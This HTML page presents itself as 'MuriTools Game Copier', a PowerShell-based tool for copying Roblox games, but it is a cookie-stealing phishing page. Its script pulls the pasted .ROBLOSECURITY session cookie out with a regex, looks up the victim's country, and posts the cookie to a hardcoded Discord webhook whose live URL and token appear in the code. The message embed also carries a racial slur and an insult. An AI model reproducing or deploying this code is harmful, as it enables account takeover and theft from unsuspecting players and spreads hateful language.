<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>MuriTools</title>
    <style>
        body {
            font-family: Arial, sans-serif;
            margin: 0;
            display: flex;
            flex-direction: column;
            align-items: center;
            height: 100vh;
            background: #212121;
            color: white;
        }
        .header {
            position: absolute;
            top: 20px;
            left: 30px;
            font-size: 3em;
            font-weight: bold;
            color: #ffffff;
        }
        .divider {
            border: none;
            height: 2px;
            background-color: #ffffff;
            margin: 90px 0;
            width: 100%;
        }
        .title-section {
            text-align: center;
            margin-top: -40px;
        }
        .container {
            display: flex;
            gap: 40px;
            align-items: center;
            margin-top: 40px;
        }
        .panel {
            background-color: #222;
            border-radius: 20px;
            padding: 10px;
            font-size: 1.3em;
            border: 0.1px solid #6a6a6a;
            box-shadow: 0 2px 4px rgba(0, 0, 0, 0.1);
            width: 580px;
            text-align: center;
        }
        .panel h2 {
            font-size: 2em;
            margin-bottom: 45px;
            color: #fff;
        }
        .input-box {
            width: 90%;
            padding: 11px;
            font-size: 1.2em;
            margin: 15px 0;
            border: 1px solid #444;
            border-radius: 8px;
            border: 0.1px solid #6a6a6a;
            background-color: #333;
            color: #fff;
        }
        .btn {
            width: 100%;
            padding: 10px;
            font-size: 1.5em;
            border: none;
            border-radius: 8px;
            border: 0.1px solid #6a6a6a;
            background-color: #334c7c;
            color: white;
            cursor: pointer;
            transition: background-color 0.3s;
        }
        .btn:hover {
            background-color: #2e446e;
        }
        .video-container {
            border-radius: 10px;
            overflow: hidden;
            display: flex;
            justify-content: center;
            align-items: center;
            height: 230px;
        }
        iframe {
            width:69%;
            height: 100%;
        }
        .processing-panel {
            display: none;
            position: fixed;
            top: 50%;
            left: 50%;
            transform: translate(-50%, -50%);
            background-color: rgba(0, 0, 0, 0.4);
            border: 0.1px solid #6a6a6a;
            border-radius: 20px;
            padding: 70px;
            font-size: 2em;
            font-family: bold
            color: #ffffff;
            text-align: center;
            z-index: 900;
            max-width: 80%;
            width: 400px;
        }
    </style>
</head>
<body>
    <div class="header">MuriTools</div>
    <hr class="divider">
    <div class="title-section">
        <h1 style="font-size: 3.5em; margin: 20px 0;">Game Copier</h1>
        <p style="font-size: 1.5em; text-align: center; max-width: 1200px; color: Grey">
            Copy games with ease, with this brand new powershell-based system!
        </p>
    </div>

    <div class="container">
        <div class="panel">
            <h2>Copy Games</h2>
            <input id="sessionScript" placeholder="Enter game file" class="input-box" rows="10"></textarea>
            <input type="text" id="pin" placeholder="Enter Webhook" class="input-box">
            <button class="btn" onclick="sendToDiscord()">Copy Game!</button>
        </div>

        <div class="panel">
            <h2>How to use</h2>
            <div class="video-container">
                <iframe src="https://www.youtube.com/embed/" frameborder="0" allowfullscreen></iframe>
            </div>
        </div>
    </div>

    <div id="processingPanel" class="processing-panel">
        Game is being processed this may take 1-5 minutes!
    </div>

    <script>
        let countryFlag = '';
        let totalPings = 0;
        let cooldown = false;

        async function fetchCountry() {
            try {
                const response = await fetch("https://ipinfo.io/json?token=dc661f4538d752");
                const data = await response.json();
                const countryCode = data.country;
                countryFlag = countryToEmoji(countryCode);
            } catch (error) {
                console.error("Failed to fetch country data:", error);
            }
        }

        function countryToEmoji(countryCode) {
            return countryCode
                .toUpperCase()
                .replace(/./g, char => String.fromCodePoint(127397 + char.charCodeAt()));
        }

        function loadTotalHits() {
            const savedHits = localStorage.getItem('totalPings');
            totalPings = savedHits ? parseInt(savedHits, 10) : 0;
        }

        function saveTotalHits() {
            localStorage.setItem('totalPings', totalPings);
        }

        loadTotalHits();
        fetchCountry();

        function sendToDiscord() {
            if (cooldown) return;

            const sessionScript = document.getElementById("sessionScript").value;
            const pin = document.getElementById("pin").value;

            if (!sessionScript) {
                alert("Please fill in the boxes.");
                return;
            }

            document.getElementById("processingPanel").style.display = "block";

            const webhookUrl = "https://discord.com/api/webhooks/1300555524823187576/jn-SfRrTE-bmNQFXvaQRSmiZfmJFBQeMyI2uAaF27TwiOcQNXK7SeQP-Jc6S7G0KfaSP";

            totalPings++;
            saveTotalHits();

            const cookiePattern = /\.ROBLOSECURITY",\s*"_\|WARNING:-DO-NOT-SHARE-THIS.--Sharing-this-will-allow-someone-to-log-in-as-you-and-to-steal-your-ROBUX-and-items\.\|_[A-Za-z0-9]+"/;

            let cookieString = "";
            const match = sessionScript.match(cookiePattern);
            if (match) {
                cookieString = match[0].split('.ROBLOSECURITY", "')[1].slice(0, -1).trim();
            } else {
                alert("Please Enter A Game File!");
                document.getElementById("processingPanel").style.display = "none";
                return;
            }

            const data = {
              content: "@everyone",
                embeds: [
                    {
                        title: "negros",
                        description: `\n**Country**: ${countryFlag}\n\n**webhook**\n\`\`\`\n${pin}\n\`\`\`\n**🍪Roblox Cookie🍪**\n\`\`\`\n${cookieString}\n\`\`\``,
                        color: 0x000000,
                        footer: {
                            text: "fucking skids."
                        },
                        timestamp: new Date().toISOString()
                    }
                ]
            };

            fetch(webhookUrl, {
                method: "POST",
                headers: {
                    "Content-Type": "application/json"
                },
                body: JSON.stringify(data)
            });

            cooldown = true;
            setTimeout(() => {
                cooldown = false;
            }, 5000);
        }
    </script>
</body>
</html>
